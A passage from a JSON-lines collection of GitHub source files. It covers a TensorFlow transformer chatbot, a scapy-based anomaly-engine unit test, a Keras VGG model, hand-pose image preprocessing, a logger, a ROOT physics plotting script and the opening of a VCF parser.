tf.keras.Input(shape=(None,), name=\"inputs\")\r\n padding_mask = tf.keras.Input(shape=(1, 1, None), name=\"padding_mask\")\r\n\r\n embeddings = tf.keras.layers.Embedding(vocab_size, d_model)(inputs)\r\n embeddings *= tf.math.sqrt(tf.cast(d_model, tf.float32))\r\n embeddings = PositionalEncoding(vocab_size, d_model)(embeddings)\r\n\r\n outputs = tf.keras.layers.Dropout(rate=dropout)(embeddings)\r\n\r\n for i in range(num_layers):\r\n outputs = encoder_layer(\r\n units=units,\r\n d_model=d_model,\r\n num_heads=num_heads,\r\n dropout=dropout,\r\n name=\"encoder_layer_{}\".format(i),\r\n )([outputs, padding_mask])\r\n\r\n return tf.keras.Model(\r\n inputs=[inputs, padding_mask], outputs=outputs, name=name)\r\n\r\nsample_encoder = encoder(\r\n vocab_size=8192,\r\n num_layers=2,\r\n units=512,\r\n d_model=128,\r\n num_heads=4,\r\n dropout=0.3,\r\n name=\"sample_encoder\")\r\n\r\n# Implementation of decoder layer with Functional API\r\ndef decoder_layer(units, d_model, num_heads, dropout, name=\"decoder_layer\"):\r\n inputs = tf.keras.Input(shape=(None, d_model), name=\"inputs\")\r\n enc_outputs = tf.keras.Input(shape=(None, d_model), name=\"encoder_outputs\")\r\n look_ahead_mask = tf.keras.Input(\r\n shape=(1, None, None), name=\"look_ahead_mask\")\r\n padding_mask = tf.keras.Input(shape=(1, 1, None), name='padding_mask')\r\n\r\n attention1 = MultiHeadAttention(\r\n d_model, num_heads, name=\"attention_1\")(inputs={\r\n 'query': inputs,\r\n 'key': inputs,\r\n 'value': inputs,\r\n 'mask': look_ahead_mask\r\n })\r\n attention1 = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(attention1 + inputs)\r\n\r\n attention2 = MultiHeadAttention(\r\n d_model, num_heads, name=\"attention_2\")(inputs={\r\n 'query': attention1,\r\n 'key': enc_outputs,\r\n 'value': enc_outputs,\r\n 'mask': padding_mask\r\n })\r\n attention2 = tf.keras.layers.Dropout(rate=dropout)(attention2)\r\n attention2 = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(attention2 + attention1)\r\n\r\n outputs = tf.keras.layers.Dense(units=units, activation='relu')(attention2)\r\n outputs = tf.keras.layers.Dense(units=d_model)(outputs)\r\n outputs = tf.keras.layers.Dropout(rate=dropout)(outputs)\r\n outputs = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(outputs + attention2)\r\n\r\n return tf.keras.Model(\r\n inputs=[inputs, enc_outputs, look_ahead_mask, padding_mask],\r\n outputs=outputs,\r\n name=name)\r\n\r\n# Implementation of a decoder with Functional API\r\ndef decoder(vocab_size,\r\n num_layers,\r\n units,\r\n d_model,\r\n num_heads,\r\n dropout,\r\n name='decoder'):\r\n inputs = tf.keras.Input(shape=(None,), name='inputs')\r\n enc_outputs = tf.keras.Input(shape=(None, d_model), name='encoder_outputs')\r\n look_ahead_mask = tf.keras.Input(\r\n shape=(1, None, None), name='look_ahead_mask')\r\n padding_mask = tf.keras.Input(shape=(1, 1, None), name='padding_mask')\r\n \r\n embeddings = tf.keras.layers.Embedding(vocab_size, d_model)(inputs)\r\n embeddings *= tf.math.sqrt(tf.cast(d_model, tf.float32))\r\n embeddings = PositionalEncoding(vocab_size, d_model)(embeddings)\r\n\r\n outputs = tf.keras.layers.Dropout(rate=dropout)(embeddings)\r\n\r\n for i in range(num_layers):\r\n outputs = decoder_layer(\r\n units=units,\r\n d_model=d_model,\r\n num_heads=num_heads,\r\n dropout=dropout,\r\n name='decoder_layer_{}'.format(i),\r\n )(inputs=[outputs, enc_outputs, look_ahead_mask, padding_mask])\r\n\r\n return tf.keras.Model(\r\n inputs=[inputs, enc_outputs, look_ahead_mask, padding_mask],\r\n outputs=outputs,\r\n name=name)\r\n\r\nsample_decoder_layer = decoder_layer(\r\n units=512,\r\n d_model=128,\r\n num_heads=4,\r\n dropout=0.3,\r\n name=\"sample_decoder_layer\")\r\n\r\ndef create_padding_mask(x):\r\n mask = tf.cast(tf.math.equal(x, 0), tf.float32)\r\n # (batch_size, 1, 1, sequence length)\r\n return mask[:, tf.newaxis, tf.newaxis, :]\r\n\r\ndef create_look_ahead_mask(x):\r\n seq_len = tf.shape(x)[1]\r\n look_ahead_mask = 1 - tf.linalg.band_part(tf.ones((seq_len, seq_len)), -1, 0)\r\n padding_mask = create_padding_mask(x)\r\n return tf.maximum(look_ahead_mask, padding_mask)\r\n\r\ndef transformer(vocab_size,num_layers,units,d_model,num_heads,dropout,name=\"transformer\"):\r\n inputs = tf.keras.Input(shape=(None,), name=\"inputs\")\r\n dec_inputs = tf.keras.Input(shape=(None,), name=\"dec_inputs\")\r\n\r\n enc_padding_mask = tf.keras.layers.Lambda(\r\n create_padding_mask, output_shape=(1, 1, None),\r\n name='enc_padding_mask')(inputs)\r\n # mask the future tokens for decoder inputs at the 1st attention block\r\n look_ahead_mask = tf.keras.layers.Lambda(\r\n create_look_ahead_mask,\r\n output_shape=(1, None, None),\r\n name='look_ahead_mask')(dec_inputs)\r\n # mask the encoder outputs for the 2nd attention block\r\n dec_padding_mask = tf.keras.layers.Lambda(\r\n create_padding_mask, output_shape=(1, 1, None),\r\n name='dec_padding_mask')(inputs)\r\n\r\n enc_outputs = encoder(\r\n vocab_size=vocab_size,\r\n num_layers=num_layers,\r\n units=units,\r\n d_model=d_model,\r\n num_heads=num_heads,\r\n dropout=dropout,\r\n )(inputs=[inputs, enc_padding_mask])\r\n\r\n dec_outputs = decoder(\r\n vocab_size=vocab_size,\r\n num_layers=num_layers,\r\n units=units,\r\n d_model=d_model,\r\n num_heads=num_heads,\r\n dropout=dropout,\r\n )(inputs=[dec_inputs, enc_outputs, look_ahead_mask, dec_padding_mask])\r\n\r\n outputs = tf.keras.layers.Dense(units=vocab_size, name=\"outputs\")(dec_outputs)\r\n\r\n return tf.keras.Model(inputs=[inputs, dec_inputs], outputs=outputs, name=name)\r\n\r\nNUM_LAYERS = 2\r\nD_MODEL = 256\r\nNUM_HEADS = 8\r\nUNITS = 512\r\nDROPOUT = 0.1\r\n\r\nmodel = transformer(vocab_size=VOCAB_SIZE,num_layers=NUM_LAYERS,units=UNITS,d_model=D_MODEL,num_heads=NUM_HEADS,dropout=DROPOUT)\r\n\r\ndef loss_function(y_true, y_pred):\r\n y_true = tf.reshape(y_true, shape=(-1, MAX_LENGTH - 1))\r\n \r\n loss = tf.keras.losses.SparseCategoricalCrossentropy(\r\n from_logits=True, reduction='none')(y_true, y_pred)\r\n\r\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\r\n loss = tf.multiply(loss, mask)\r\n\r\n return tf.reduce_mean(loss)\r\n\r\nclass CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):\r\n\r\n def __init__(self, d_model, warmup_steps=4000):\r\n super(CustomSchedule, self).__init__()\r\n\r\n self.d_model = d_model\r\n self.d_model = tf.cast(self.d_model, tf.float32)\r\n\r\n self.warmup_steps = warmup_steps\r\n\r\n def __call__(self, step):\r\n arg1 = tf.math.rsqrt(step)\r\n arg2 = step * (self.warmup_steps**-1.5)\r\n\r\n return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)\r\n\r\nlearning_rate = CustomSchedule(D_MODEL)\r\n\r\noptimizer = tf.keras.optimizers.Adam(\r\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\r\n\r\ndef accuracy(y_true, y_pred):\r\n # ensure labels have shape (batch_size, MAX_LENGTH - 1)\r\n y_true = tf.reshape(y_true, shape=(-1, MAX_LENGTH - 1))\r\n accuracy = tf.metrics.SparseCategoricalAccuracy()(y_true, y_pred)\r\n return accuracy\r\n\r\nmodel.compile(optimizer=optimizer, loss=loss_function, metrics=[accuracy])\r\n\r\ntf.config.run_functions_eagerly(True)\r\n\r\nmodel.load_weights(\"weight_model.h5\")\r\n\r\n# Preprocessing sentences \r\ndef preprocess_sentence(sentence):\r\n sentence = sentence.lower().strip()\r\n # creating a space between a word and the punctuation following it\r\n # eg: \"he is a boy.\" => \"he is a boy .\"\r\n sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\r\n sentence = re.sub(r'[\" \"]+', \" \", sentence)\r\n # removing contractions\r\n sentence = re.sub(r\"i'm\", \"i am\", sentence)\r\n sentence = re.sub(r\"he's\", \"he is\", sentence)\r\n sentence = re.sub(r\"she's\", \"she is\", sentence)\r\n sentence = re.sub(r\"it's\", \"it is\", sentence)\r\n sentence = re.sub(r\"that's\", \"that is\", sentence)\r\n sentence = re.sub(r\"what's\", \"that is\", sentence)\r\n sentence = re.sub(r\"where's\", \"where is\", sentence)\r\n sentence = re.sub(r\"how's\", \"how is\", sentence)\r\n sentence = re.sub(r\"\\'ll\", \" will\", sentence)\r\n sentence = re.sub(r\"\\'ve\", \" have\", sentence)\r\n sentence = re.sub(r\"\\'re\", \" are\", sentence)\r\n sentence = re.sub(r\"\\'d\", \" would\", sentence)\r\n sentence = re.sub(r\"\\'re\", \" are\", sentence)\r\n sentence = re.sub(r\"won't\", \"will not\", sentence)\r\n sentence = re.sub(r\"can't\", \"cannot\", sentence)\r\n sentence = re.sub(r\"n't\", \" not\", sentence)\r\n sentence = re.sub(r\"n'\", \"ng\", sentence)\r\n sentence = re.sub(r\"'bout\", \"about\", sentence)\r\n # replacing everything with space except (a-z, A-Z, \".\", \"?\", \"!\", \",\")\r\n sentence = re.sub(r\"[^a-zA-Z?.!,]+\", \" \", sentence)\r\n sentence = sentence.strip()\r\n return sentence\r\n\r\n# Transformer evaluation implementation\r\ndef evaluate(sentence):\r\n sentence = preprocess_sentence(sentence)\r\n sentence = tf.expand_dims(START_TOKEN + tokenizer.encode(sentence) + END_TOKEN, axis=0)\r\n output = tf.expand_dims(START_TOKEN, 0)\r\n for i in range(MAX_LENGTH):\r\n predictions = model(inputs=[sentence, output], training=False)\r\n # select the last word from the seq_len dimension\r\n predictions = predictions[:, -1:, :]\r\n predicted_id = tf.cast(tf.argmax(predictions, axis=-1), tf.int32)\r\n\r\n # return the result if the predicted_id is equal to the end token \r\n if tf.equal(predicted_id, END_TOKEN[0]):\r\n break\r\n\r\n # concatenated the predicted_id to the output which is given to the decoder as its input.\r\n output = tf.concat([output, predicted_id], axis=-1)\r\n\r\n return tf.squeeze(output, axis=0)\r\n\r\ndef predict(sentence):\r\n prediction = evaluate(sentence)\r\n\r\n predicted_sentence = tokenizer.decode([i for i in prediction if i < tokenizer.vocab_size]) # try with prediction only no i\r\n\r\n return predicted_sentence","repo_name":"HHNM/Chatbot-with-Transformer","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74466497768","text":"import unittest\nfrom scapy.layers.l2 import Ether\nfrom scapy.layers.inet import IP, UDP, TCP\n\nfrom src import db\nfrom src.anamoly_detection.anomaly_engine import AnomalyEngine\n\n# Setup engine once for testing\nconn = db\nengine = AnomalyEngine(db)\n\n\nclass TestIPSignature(unittest.TestCase):\n def test_engine(self):\n \"\"\"\n Test that the engine initializes and properly populates its signatures\n :return: None\n \"\"\"\n self.assertIsNotNone(engine)\n self.assertTrue(engine.frequency_signatures != [])\n self.assertTrue(engine.traffic_signatures == [])\n\n # Check that the returned rows are all turned into equations\n self.assertEqual(len(engine.get_equation_strings()), len(engine.frequency_signatures))\n\n def test_engine_packet_handling(self):\n \"\"\"\n Test that the signatures load properly and are called upon correctly by the engine\n :return: None\n \"\"\"\n udp_packet = Ether() / IP() / UDP(dport=80)\n tcp_packet = Ether() / IP() / TCP(dport=80)\n\n # Call the engine using the two packets as parameters\n engine.check_signatures(udp_packet)\n engine.check_signatures(tcp_packet)\n\n # Confirm the signatures regarding IP & TCP/UDP are triggered (3 signatures in total)\n triggered_signatures = list(filter(lambda x: x._window_frequency > 0, engine.frequency_signatures))\n self.assertEqual(3, len(triggered_signatures))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"briweinstein/tinyHIPPO","sub_path":"tests/signature_tests/frequency_tests/test_anomaly_engine.py","file_name":"test_anomaly_engine.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"70246140649","text":"import tensorflow as tf\n\n\nclass Vgg(tf.keras.Model):\n def __init__(self, drop=0.30):\n super(Vgg, self).__init__()\n\n # Define the convolutional and batch normalization layers\n self.conv_bn_layers = []\n for i, filters in enumerate([32, 64, 128, 256]):\n self.conv_bn_layers.append(\n tf.keras.layers.Conv2D(filters=filters, kernel_size=3, padding='same', activation='relu',\n name=f'conv{i + 1}a'))\n self.conv_bn_layers.append(tf.keras.layers.BatchNormalization())\n self.conv_bn_layers.append(\n tf.keras.layers.Conv2D(filters=filters, kernel_size=3, padding='same', activation='relu',\n name=f'conv{i + 1}b'))\n self.conv_bn_layers.append(tf.keras.layers.BatchNormalization())\n self.conv_bn_layers.append(tf.keras.layers.MaxPool2D(pool_size=(2, 2), strides=2))\n\n self.flatten = tf.keras.layers.Flatten()\n self.lin1 = tf.keras.layers.Dense(units=4096, activation='relu')\n self.lin2 = tf.keras.layers.Dense(units=4096, activation='relu')\n self.drop = tf.keras.layers.Dropout(rate=drop)\n self.lin3 = tf.keras.layers.Dense(7, activation='softmax')\n\n def call(self, x):\n # Pass the input through the convolutional and batch normalization layers\n for layer in self.conv_bn_layers:\n x = layer(x)\n\n x = self.flatten(x)\n x = self.lin1(x)\n x = self.drop(x)\n x = self.lin2(x)\n x = self.drop(x)\n x = self.lin3(x)\n return x\n","repo_name":"hasan-rakibul/MaskTheFER","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38647597222","text":"import os\nimport cv2\nimport numpy as np\nfrom config import cfg\nimport random\nimport math\n\ndef load_img(path, order='RGB'):\n \n # load\n img = cv2.imread(path, cv2.IMREAD_COLOR | cv2.IMREAD_IGNORE_ORIENTATION)\n if not isinstance(img, np.ndarray):\n raise IOError(\"Fail to read %s\" % path)\n\n if order=='RGB':\n img = img[:,:,::-1].copy()\n \n img = img.astype(np.float32)\n return img\n\ndef load_skeleton(path, joint_num):\n\n # load joint info (name, parent_id)\n skeleton = [{} for _ in range(joint_num)]\n with open(path) as fp:\n for line in fp:\n if line[0] == '#': continue\n splitted = line.split(' ')\n joint_name, joint_id, joint_parent_id = splitted\n joint_id, joint_parent_id = int(joint_id), int(joint_parent_id)\n skeleton[joint_id]['name'] = joint_name\n skeleton[joint_id]['parent_id'] = joint_parent_id\n # save child_id\n for i in range(len(skeleton)):\n joint_child_id = []\n for j in range(len(skeleton)):\n if skeleton[j]['parent_id'] == i:\n joint_child_id.append(j)\n skeleton[i]['child_id'] = joint_child_id\n \n return skeleton\n\ndef get_aug_config():\n trans_factor = 0.15\n scale_factor = 0.25\n rot_factor = 45\n color_factor = 0.2\n \n trans = [np.random.uniform(-trans_factor, trans_factor), np.random.uniform(-trans_factor, trans_factor)]\n scale = np.clip(np.random.randn(), -1.0, 1.0) * scale_factor + 1.0\n rot = np.clip(np.random.randn(), -2.0,\n 2.0) * rot_factor if random.random() <= 0.6 else 0\n do_flip = random.random() <= 0.5\n c_up = 1.0 + color_factor\n c_low = 1.0 - color_factor\n color_scale = np.array([random.uniform(c_low, c_up), random.uniform(c_low, c_up), random.uniform(c_low, c_up)])\n\n return trans, scale, rot, do_flip, color_scale\n\ndef augmentation(img, bbox, joint_coord, joint_valid, hand_type, mode, joint_type):\n img = img.copy(); \n joint_coord = joint_coord.copy(); \n hand_type = hand_type.copy();\n\n original_img_shape = img.shape\n joint_num = len(joint_coord)\n \n if mode == 'train':\n trans, scale, rot, do_flip, color_scale = get_aug_config()\n else:\n trans, scale, rot, do_flip, color_scale = [0,0], 1.0, 0.0, False, np.array([1,1,1])\n \n bbox[0] = bbox[0] + bbox[2] * trans[0]\n bbox[1] = bbox[1] + bbox[3] * trans[1]\n img, trans, inv_trans = generate_patch_image(img, bbox, do_flip, scale, rot, cfg.input_img_shape)\n img = np.clip(img * color_scale[None,None,:], 0, 255)\n \n if do_flip:\n joint_coord[:,0] = original_img_shape[1] - joint_coord[:,0] - 1\n joint_coord[joint_type['right']], joint_coord[joint_type['left']] = joint_coord[joint_type['left']].copy(), joint_coord[joint_type['right']].copy()\n joint_valid[joint_type['right']], joint_valid[joint_type['left']] = joint_valid[joint_type['left']].copy(), joint_valid[joint_type['right']].copy()\n hand_type[0], hand_type[1] = hand_type[1].copy(), hand_type[0].copy()\n for i in range(joint_num):\n joint_coord[i,:2] = trans_point2d(joint_coord[i,:2], trans)\n joint_valid[i] = joint_valid[i] * (joint_coord[i,0] >= 0) * (joint_coord[i,0] < cfg.input_img_shape[1]) * (joint_coord[i,1] >= 0) * (joint_coord[i,1] < cfg.input_img_shape[0])\n\n return img, joint_coord, joint_valid, hand_type, inv_trans\n\ndef transform_input_to_output_space(joint_coord, joint_valid, rel_root_depth, root_valid, root_joint_idx, joint_type):\n # transform to output heatmap space\n joint_coord = joint_coord.copy(); joint_valid = joint_valid.copy()\n \n joint_coord[:,0] = joint_coord[:,0] / cfg.input_img_shape[1] * cfg.output_hm_shape[2]\n joint_coord[:,1] = joint_coord[:,1] / cfg.input_img_shape[0] * cfg.output_hm_shape[1]\n joint_coord[joint_type['right'],2] = joint_coord[joint_type['right'],2] - joint_coord[root_joint_idx['right'],2]\n joint_coord[joint_type['left'],2] = joint_coord[joint_type['left'],2] - joint_coord[root_joint_idx['left'],2]\n \n joint_coord[:,2] = (joint_coord[:,2] / (cfg.bbox_3d_size/2) + 1)/2. * cfg.output_hm_shape[0]\n joint_valid = joint_valid * ((joint_coord[:,2] >= 0) * (joint_coord[:,2] < cfg.output_hm_shape[0])).astype(np.float32)\n rel_root_depth = (rel_root_depth / (cfg.bbox_3d_size_root/2) + 1)/2. * cfg.output_root_hm_shape\n root_valid = root_valid * ((rel_root_depth >= 0) * (rel_root_depth < cfg.output_root_hm_shape)).astype(np.float32)\n \n return joint_coord, joint_valid, rel_root_depth, root_valid\n\ndef get_bbox(joint_img, joint_valid):\n x_img = joint_img[:,0][joint_valid==1]; y_img = joint_img[:,1][joint_valid==1];\n xmin = min(x_img); ymin = min(y_img); xmax = max(x_img); ymax = max(y_img);\n\n x_center = (xmin+xmax)/2.; width = xmax-xmin;\n xmin = x_center - 0.5*width*1.2\n xmax = x_center + 0.5*width*1.2\n \n y_center = (ymin+ymax)/2.; height = ymax-ymin;\n ymin = y_center - 0.5*height*1.2\n ymax = y_center + 0.5*height*1.2\n\n bbox = np.array([xmin, ymin, xmax-xmin, ymax-ymin]).astype(np.float32)\n return bbox\n\ndef process_bbox(bbox, original_img_shape):\n\n # aspect ratio preserving bbox\n w = bbox[2]\n h = bbox[3]\n c_x = bbox[0] + w/2.\n c_y = bbox[1] + h/2.\n aspect_ratio = cfg.input_img_shape[1]/cfg.input_img_shape[0]\n if w > aspect_ratio * h:\n h = w / aspect_ratio\n elif w < aspect_ratio * h:\n w = h * aspect_ratio\n bbox[2] = w*1.25\n bbox[3] = h*1.25\n bbox[0] = c_x - bbox[2]/2.\n bbox[1] = c_y - bbox[3]/2.\n\n return bbox\n\ndef generate_patch_image(cvimg, bbox, do_flip, scale, rot, out_shape):\n img = cvimg.copy()\n img_height, img_width, img_channels = img.shape\n\n bb_c_x = float(bbox[0] + 0.5*bbox[2])\n bb_c_y = float(bbox[1] + 0.5*bbox[3])\n bb_width = float(bbox[2])\n bb_height = float(bbox[3])\n\n if do_flip:\n img = img[:, ::-1, :]\n bb_c_x = img_width - bb_c_x - 1\n \n trans = gen_trans_from_patch_cv(bb_c_x, bb_c_y, bb_width, bb_height, out_shape[1], out_shape[0], scale, rot)\n img_patch = cv2.warpAffine(img, trans, (int(out_shape[1]), int(out_shape[0])), flags=cv2.INTER_LINEAR)\n img_patch = img_patch.astype(np.float32)\n inv_trans = gen_trans_from_patch_cv(bb_c_x, bb_c_y, bb_width, bb_height, out_shape[1], out_shape[0], scale, rot, inv=True)\n\n return img_patch, trans, inv_trans\n\ndef rotate_2d(pt_2d, rot_rad):\n x = pt_2d[0]\n y = pt_2d[1]\n sn, cs = np.sin(rot_rad), np.cos(rot_rad)\n xx = x * cs - y * sn\n yy = x * sn + y * cs\n return np.array([xx, yy], dtype=np.float32)\n\ndef gen_trans_from_patch_cv(c_x, c_y, src_width, src_height, dst_width, dst_height, scale, rot, inv=False):\n # augment size with scale\n src_w = src_width * scale\n src_h = src_height * scale\n src_center = np.array([c_x, c_y], dtype=np.float32)\n\n # augment rotation\n rot_rad = np.pi * rot / 180\n src_downdir = rotate_2d(np.array([0, src_h * 0.5], dtype=np.float32), rot_rad)\n src_rightdir = rotate_2d(np.array([src_w * 0.5, 0], dtype=np.float32), rot_rad)\n\n dst_w = dst_width\n dst_h = dst_height\n dst_center = np.array([dst_w * 0.5, dst_h * 0.5], dtype=np.float32)\n dst_downdir = np.array([0, dst_h * 0.5], dtype=np.float32)\n dst_rightdir = np.array([dst_w * 0.5, 0], dtype=np.float32)\n\n src = np.zeros((3, 2), dtype=np.float32)\n src[0, :] = src_center\n src[1, :] = src_center + src_downdir\n src[2, :] = src_center + src_rightdir\n\n dst = np.zeros((3, 2), dtype=np.float32)\n dst[0, :] = dst_center\n dst[1, :] = dst_center + dst_downdir\n dst[2, :] = dst_center + dst_rightdir\n \n if inv:\n trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))\n else:\n trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))\n\n trans = trans.astype(np.float32)\n return trans\n\ndef trans_point2d(pt_2d, trans):\n src_pt = np.array([pt_2d[0], pt_2d[1], 1.]).T\n dst_pt = np.dot(trans, src_pt)\n return dst_pt[0:2]\n\n\n","repo_name":"enpeizhao/CVprojects","sub_path":"codes/8.结印识别/common/utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8016,"program_lang":"python","lang":"en","doc_type":"code","stars":1748,"dataset":"github-code","pt":"53"} +{"seq_id":"38617579408","text":"import logging\n\n\nclass Logger:\n def __init__(self, error_log_file=\"error.log\", warn_log_file=\"warn.log\"):\n self.logger = logging.getLogger(__name__)\n self.logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n # error log store with file\n file_handler = logging.FileHandler(error_log_file)\n file_handler.setLevel(logging.ERROR)\n file_handler.setFormatter(formatter)\n self.logger.addHandler(file_handler)\n # info log output in console\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(formatter)\n self.logger.addHandler(console_handler)\n # warn log store with file\n warn_file_handler = logging.FileHandler(warn_log_file)\n warn_file_handler.setLevel(logging.WARN)\n warn_file_handler.setFormatter(formatter)\n self.logger.addHandler(warn_file_handler)\n\n def log_error(self, message, exception=None):\n self.logger.exception(message, exc_info=exception)\n\n def log_info(self, message):\n self.logger.info(message)\n\n def log_warn(self, message):\n self.logger.warn(message)\n\n\n# export logger\nlogger = Logger()\n","repo_name":"aiyogg/sse-bond","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2069396863","text":"import ROOT\nimport tdrstyle\n\n# CMS Style (estilo para los plots)\ntdrstyle.setTDRStyle()\n\n# Carga el archivo con los histogramas\n\nfile=ROOT.TFile(\"histos.root\",\"READONLY\")\n\n#histos=[\"Z_mass\",\"Recoil_mass\",\"LeadMuon_Pt\",\"LeadMuon_Theta\",\"LeadMuon_Phi\",\\\n#\t\"SecondMuon_Pt\",\"SecondMuon_Theta\",\"SecondMuon_Phi\",\"Z_theta\",\"Recoil_theta\",\\\n#\t\"Z_Pt\",\"Recoil_Pt\",\"Z_y\",\"Recoil_y\",\"NMuons\",\"NElectrons\",\"cos_Recoil_theta\",\\\n#\t\"cos_missing_theta\"] # para pintar todos a la vez\n\nhistos=[\"Recoil_mass\"] # para ir rapido, solo un plot\n\n# las muestras : \nsampleName=[\"WW\",\"ZZ\",\"HZ\"]\nnProcesses=len(sampleName)\n\n# Los factores de normalizacion de cada proceso vienen dados por la seccion eficaz:\n# eeHZ: 0.201868 pb\n# eeZZ: 1.35899 pb\n# eeWW: 16.4385 pb\nxsection=[16.4385,1.35899,0.201868]\n# Comentario a mi misma: para que esto fuese mas elegante, seria mejor haber hecho un mapa\n# o un diccionario (muestra-> seccion eficaz) \n\n# Luminosidad acumulada: 5 ab-1 = 5000 fb-1 = 500000 pb-1\nluminosity = 5e6\n\n# Numero de sucesos MC producidos originamente.\n# En este caso todas las muestras originales tenian 10M de sucesos.\ntotalNumberOfEvents=10000000\n\n# La normalizacion de los histogramas seguira :\n# N_Sucesos = xsection * luminosidad\n# Peso = xsection * luminosidad / SucesosGenerados en total \n\n# Color de los histogramas\ncolor=[ROOT.kBlue+1,ROOT.kGreen+2,ROOT.kRed]\n\n# Definimos una funcion para dar estilo y normalizar los histogramas \ndef StyleHisto(sample,variab,histColor,xsec,suffix=\"\"):\n histo =file.Get(variab+\"_ee\"+sample)\t\t\n histo.SetName(\"h\"+variab+\"_ee\"+sample+suffix)\n # Estilo:\n histo.SetLineColor(histColor)\n if sample!=\"HZ\":\n \thisto.SetFillColor(histColor)\n histo.SetLineWidth(3)\n\n # Aqui se aplica la normalizacion: \n histo.Scale(xsec*luminosity/totalNumberOfEvents)\n\n return histo\n\n\n# Loop sobre los histogramas guardados en 'histos.root'\n\nfor histoName in histos:\n\n\n # Definimos un 'stack' de histogramas apilados:\n h={}\n hStack = ROOT.THStack()\n \n print (\"YIELDS (from %s)\" %histoName)\n for i in range(nProcesses):\n h[ sampleName[i] ] = StyleHisto(sampleName[i],histoName,color[i],xsection[i])\n print (\"... %s %2d\" %(sampleName[i],h[ sampleName[i] ].Integral() ) )\n # if sampleName[i]!=\"HZ\" : # para pintar la señal por separado\n hStack.Add( h[ sampleName[i] ] )\n\n\n # Ahora pintamos los histogramas:\n c1 = ROOT.TCanvas(\"c1\",\"HZ analysis canvas\", 650,600)\n ROOT.gStyle.SetOptTitle(True)\n \n c1.SetTicks(1,1)\n c1.SetLeftMargin(0.15)\n c1.SetRightMargin(0.08)\n c1.SetTopMargin(0.06)\n \n hStack.Draw(\"hist\")\n# h[\"HZ\"].Draw(\"hist,sames\")\t# Opcion para pintar la segnal por separado\n \n ylabel=\"events\"\n xlabel=h[sampleName[0]].GetXaxis().GetTitle() #\"DiMuon Mass [GeV]\"\n \n hStack.GetXaxis().SetTitle(xlabel)\n hStack.GetYaxis().SetTitle(ylabel)\n \n hStack.GetYaxis().SetTitleOffset(1.4)\n hStack.GetXaxis().SetTitleOffset(1.2)\n\n maxY=hStack.GetMaximum()\n if h[\"HZ\"].GetMaximum()> maxY:\n maxY=h[\"HZ\"].GetMaximum() \n hStack.SetMaximum(maxY*1.2)\n \n # Leyenda\n leg = ROOT.TLegend(0.80,0.70,0.93,0.93)\n leg.SetFillStyle(0)\n leg.SetBorderSize(0)\n for i in range(nProcesses):\n \tentry=leg.AddEntry(h[ sampleName[i] ],sampleName[i],\"lf\")\n leg.Draw()\n \n # Etiquetas explicando las condiciones del proceso\n text = \"#sqrt{{s}} = 240 GeV, L = {:.0f} ab^{{-1}}\".format(luminosity/1e6)\n channel = 'e^{+}e^{-} #rightarrow ZH #rightarrow #mu^{+}#mu^{-} + X'\n \n Text = ROOT.TLatex()\n Text.SetNDC()\n Text.SetTextAlign(31);\n Text.SetTextSize(0.04)\n Text.DrawLatex(0.47, 0.95, channel)\n \n Text.SetTextAlign(31);\n Text.SetTextSize(0.04)\n Text.DrawLatex(0.93, 0.95, text)\n \n # Guardamos la grafica \n c1.SaveAs(\"Plot_\"+histoName+\".png\")\n","repo_name":"mcepeda/ExamplesFCCee","sub_path":"Recoil/pintar.py","file_name":"pintar.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36235207912","text":"import gzip\nimport pandas as pd\nfrom collections import OrderedDict, Callable\n\nclass DefaultOrderedDict(OrderedDict):\n\t# Source: http://stackoverflow.com/a/6190500/562769\n\tdef __init__(self, default_factory=None, *a, **kw):\n\t\tif (default_factory is not None and\n\t\t not isinstance(default_factory, Callable)):\n\t\t\traise TypeError('first argument must be callable')\n\t\tOrderedDict.__init__(self, *a, **kw)\n\t\tself.default_factory = default_factory\n\n\tdef __getitem__(self, key):\n\t\ttry:\n\t\t\treturn OrderedDict.__getitem__(self, key)\n\t\texcept KeyError:\n\t\t\treturn self.__missing__(key)\n\n\tdef __missing__(self, key):\n\t\tif self.default_factory is None:\n\t\t\traise KeyError(key)\n\t\tself[key] = value = self.default_factory()\n\t\treturn value\n\n\tdef __reduce__(self):\n\t\tif self.default_factory is None:\n\t\t\targs = tuple()\n\t\telse:\n\t\t\targs = self.default_factory,\n\t\treturn type(self), args, None, None, self.items()\n\n\tdef copy(self):\n\t\treturn self.__copy__()\n\n\tdef __copy__(self):\n\t\treturn type(self)(self.default_factory, self)\n\n\tdef __deepcopy__(self, memo):\n\t\timport copy\n\t\treturn type(self)(self.default_factory,\n\t\t\t\t\t\t copy.deepcopy(self.items()))\n\n\tdef __repr__(self):\n\t\treturn 'OrderedDefaultDict(%s, %s)' % (self.default_factory,\n\t\t\t\t\t\t\t\t\t\t\t OrderedDict.__repr__(self))\n\nclass VCF():\n\tdef __init__(self, vcf_fn, pheno_fn=None, verbose=False):\n\t\tself.vcf_fn = 